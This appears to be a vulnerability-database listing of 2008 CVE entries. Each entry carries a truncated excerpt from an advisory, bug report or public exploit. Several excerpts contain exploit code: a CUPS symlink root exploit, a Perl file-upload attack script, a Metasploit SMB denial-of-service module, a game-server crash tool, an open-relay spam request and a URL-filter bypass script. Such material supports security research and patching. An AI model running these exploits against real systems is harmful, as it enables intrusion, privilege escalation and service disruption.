CVE-2008-1000: Directory traversal vulnerability in ContentServer.py in the Wiki Server in Apple Mac OS X 10.5.2 (aka Leopard) allows remote authenticated users to write…

CVE-2008-1000 [HIGH] CWE-22 GHSA-3p27-3cv2-hrjm: Directory traversal vulnerability in ContentServer Directory traversal vulnerability in ContentServer.py in the Wiki Server in Apple Mac OS X 10.5.2 (aka Leopard) allows remote authenticated users to write arbitrary files via ".." sequences in file attachments.

CVE-2008-5377 [MEDIUM] CUPS < 1.3.8-4 - Local Privilege Escalation CUPS * http://jon.oberheide.org * * Usage: * * $ gcc cve-2008-5377.c -o cve-2008-5377.c * $ ./cve-2008-5377 * $ id * uid=0(root) gid=1000(vm) ... * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377 * * pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via * a symlink attack on the /tmp/pstopdf.log temporary file. * * Operation: * * The exploit creates and prints a malformed postscript document that will * cause the CUPS pstopdf filter to write an error message out to its log * file that contains the string /tmp/getuid.so. However, since we also * symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the * error message and malicious shared library path will be appended to the * ld.so.preload file, allowing us to elevate privil

CVE-2008-5659 GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2) GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2) --- source: https://www.securityfocus.com/bid/32909/info GNU Classpath is prone to a weakness that may result in weaker cryptographic security because its psuedo-random number generator (PRNG) lacks entropy. Attackers may leverage this issue to obtain sensitive information that can lead to further attacks. Classpath 0.97.2 is vulnerable; other versions may also be affected. #include #include #include using namespace Botan; #include #include int main(int argc, char* argv[]) { Botan::LibraryInitializer init; // by default start with a guess of 1 minute ago u64bit time_guess = (std::time(0) - 60); time_guess *= 1000; // convert to ms u32bit how_many = 60000; // 60 second range by default if(argc >= 2) how_many =

CVE-2008-6806 7Shop 1.1 - Arbitrary File Upload 7Shop 1.1 - Arbitrary File Upload --- #!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand(1000) . ".php"; # int.. yes i know PU! print Spoofing + + Discovered && Coded By: t0pP8uZz + + + + Contact IRC: irc.rizon.net #sectalk + + Vendor not notified! Later versions maybe vuln! + + + + Discovered On: 25 October 2008 / milw0rm.com + + + + Script Download: http://7shop.de + +++++++++++++++++++++++++++++++++++++++++++++++++++++ INTRO print "\nEnter URL(ie: http://site.com/shop): "; chomp(my $url=); print "\nEnter File Path(path to local file to upload): "; chomp(my $file=); my $ua = LWP::UserAgent->new; my $re = $ua->request(POST $url.'/includes/imageupload.php', Content_Type => 'form-data', Content => [ img1 => [ $file, $fname, Cont

CVE-2008-7012 Accellion File Transfer Appliance Error Report Message - Open Email Relay Accellion File Transfer Appliance Error Report Message - Open Email Relay --- source: https://www.securityfocus.com/bid/31178/info Accellion File Transfer Appliance is prone to an open-email-relay vulnerability. An attacker could exploit this issue by constructing a script that would send unsolicited spam to an unrestricted amount of email addresses from a forged email address. This issue affects Accellion File Transfer Appliance prior to FTA_7_0_189. https://www.example.com/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM SPAM_ATTACK HTTP HEADER: Host: [Accelion web server] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv: 1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr

CVE-2008-4114 Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) --- require 'msf/core' module Msf module Exploits module Test class BugTest 'test exploit', 'Description' => "tests", 'Author' => 'tests', 'License' => MSF_LICENSE, 'Version' => '$Revision: 0 $', 'Arch' => 'x86', 'Payload' => { 'Space' => 1000 }, 'Targets' => [ [ 'Windows VISTA', { 'Platform' => 'win' } ], ], 'DefaultTarget' => 0)) end def subexploit(dlenlow, doffset,fillersize) print_line("1") datastore['SMBUser']='testuser' datastore['SMBPass']='testuser' datastore['SMBDomain']='COBAYA' datastore['SMBName']='COBAYA' print_line("2") connect() print_line("3") smb_login() print_line("4") pkt = CONST::SMB_CREATE_PKT.make_struct pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['S

CVE-2008-6702 S.T.A.L.K.E.R. 1.0.06 - Remote Denial of Service S.T.A.L.K.E.R. 1.0.06 - Remote Denial of Service --- // source: https://www.securityfocus.com/bid/29723/info S.T.A.L.K.E.R. game servers are prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames. Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. /* by Luigi Auriemma */ #include #include #include #include #include #ifdef WIN32 #include #include "winerr.h" #define close closesocket #define sleep Sleep #define ONESEC 1000 #else #include #include #include #include #include #include #define ONESEC 1 #endif typedef uint8_t u8; typedef uint16_t u16; typedef uint32_t u32; #define VER "0.1" #define BUFFSZ 1472 #define P

CVE-2008-1770 Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download Akamai Download Manager Download Manager window.resizeTo(500,510); var bDocReady = false; var bInsObj = false; var isLinux = (navigator.userAgent.indexOf("Linux") >= 0); var isMacFF = (navigator.userAgent.indexOf("Firefox") >= 0 && navigator.userAgent.indexOf("Mac") >= 0); var isSafari = (navigator.userAgent.indexOf("Safari") >= 0); var isSolaris = (navigator.userAgent.indexOf("Sun") >= 0); var isWinFF = (navigator.userAgent.indexOf("Firefox") >= 0 && navigator.userAgent.indexOf("Windows") >= 0); var isIE7 = (navigator.userAgent.indexOf("MSIE 7") >= 0); function doLoad() { // Start automatically setTimeout("startDLM();", 1000); return; } var bdmIsReady = false; var bDMStarted = false; var bDMFailed = false; var bShutdown = false; var startTries = 0; function closeIt

CVE-2008-1000 Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal --- source: https://www.securityfocus.com/bid/28278/info Apple Mac OS X Server Wiki Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue allows an attacker to access arbitrary files outside of the application's document root directory. This can expose sensitive information that could help the attacker launch further attacks. Note that attackers must be registered wiki users to exploit this issue. Wiki Server from Mac OS X Server 10.5 is vulnerable. Next, we show a Proof of Concept (PoC) attack to the Leopard's Wiki Server. It creates a file 'popote.php' at '/tmp/[xxxxx]/' where '[xxxxx]' are random hexa characters assigned to the fil

CVE-2008-0384 OpenBSD 4.2 - 'rtlabel_id2name()' Local Null Pointer Dereference Denial of Service OpenBSD 4.2 - 'rtlabel_id2name()' Local Null Pointer Dereference Denial of Service --- /* * OpenBSD 4.2 rtlabel_id2name() [SIOCGIFRTLABEL ioctl] * Null Pointer Dereference local Denial of Service Exploit * * by Hunger * * Advisory: * http://marc.info/?l=openbsd-security-announce&m=120007327504064 * * FOR TESTING PURPOSES ONLY! * * $ uname -mrsv * OpenBSD 4.2 GENERIC#375 i386 * $ id * uid=1000(hunger) gid=1000(hunger) groups=1000(hunger) * $ ftp -V http://hunger.hu/rtlabdos.c * 100% |******************************************| 1814 00:00 * $ gcc rtlabdos.c -o rtlabdos * $ ./rtlabdos * uvm_fault(0xd617865e0, 0x0, 0, 1) -> e * kernel: page fault trap, code=0 * Stopped at strlcpy+0x1c: movb 0(%edx),%al * ddb> trace * strlcpy(d826fd98,0,20,6,d61772a0) at strlcpy+0x1c * ifioctl(d6033280,c02069

CVE-2008-7161 Fortinet Fortigate - CRLF Characters URL Filtering Bypass Fortinet Fortigate - CRLF Characters URL Filtering Bypass --- source: https://www.securityfocus.com/bid/27276/info Fortinet Fortigate is prone to a vulnerability that can allow attackers to bypass the device's URL filtering. An attacker can exploit this issue to view unauthorized websites, bypassing certain security restrictions. This may lead to other attacks. This issue affects Fortigate-1000 3.00; other versions may also be affected. NOTE: This issue may be related to the vulnerability described in BID 16599 (Fortinet Fortigate URL Filtering Bypass Vulnerability). #!/usr/bin/perl ######################################## # fortiGuard.pl v0.1 - http://www.macula-group.com/ # # # URL Filtering Bypass proof of concept # Author: Daniel Regalado aka Danux... Hacker WannaBe!!! (only so

CVE-2008-3215 [MEDIUM] CVE-2008-3215 clamav: DoS / crash via crafted petite file (incomplete fix of CVE-2008-2713) CVE-2008-3215 clamav: DoS / crash via crafted petite file (incomplete fix of CVE-2008-2713) According to Secunia / clamav upstream, fix for CVE-2008-2713 as originally used in clamav 0.93.1 (see bug bug #451761) was incomplete: https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1000#c4 Following fix is mentioned in the 0.93.2 changelog: Thu Jul 3 16:15:23 CEST 2008 * libclamav/petite.c: fix another out of bounds memory read (bb#1000) Reported by Secunia (CVE-2008-2713) References: http://www.openwall.com/lists/oss-security/2008/07/08/5 http://lurker.clamav.net/message/20080707.155612.ad411b00.en.html Discussion: Upstream patch, now applied in SVN: http://svn.clamav.net/websvn/diff.php?repname=clamav-devel&path=/branches/0.93/libclamav/petite.c&rev=3920 --- AFAIK this is fixed since

CVE-2008-2713 [MEDIUM] CVE-2008-2713 clamav: DoS / crash via crafted petite file CVE-2008-2713 clamav: DoS / crash via crafted petite file Common Vulnerabilities and Exposures assigned an identifier CVE-2008-2713 to the following vulnerability: libclamav/petite.c in ClamAV before 0.93.1 allows remote attackers to cause a denial of service via a crafted Petite file that triggers an out-of-bounds read. Fixed in upstream: 0.93.1 Upstream bug report: https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1000 Upstream patch: http://svn.clamav.net/websvn/diff.php?repname=clamav-devel&path=/branches/0.93/libclamav/petite.c&rev=3886 References: http://www.openwall.com/lists/oss-security/2008/06/15/2 http://www.securityfocus.com/bid/29750 Should affect Fedora and EPEL clamav versions. Discussion: clamav-0.93.1-1.fc9 has been submitted as an update for Fedora 9 --- clamav-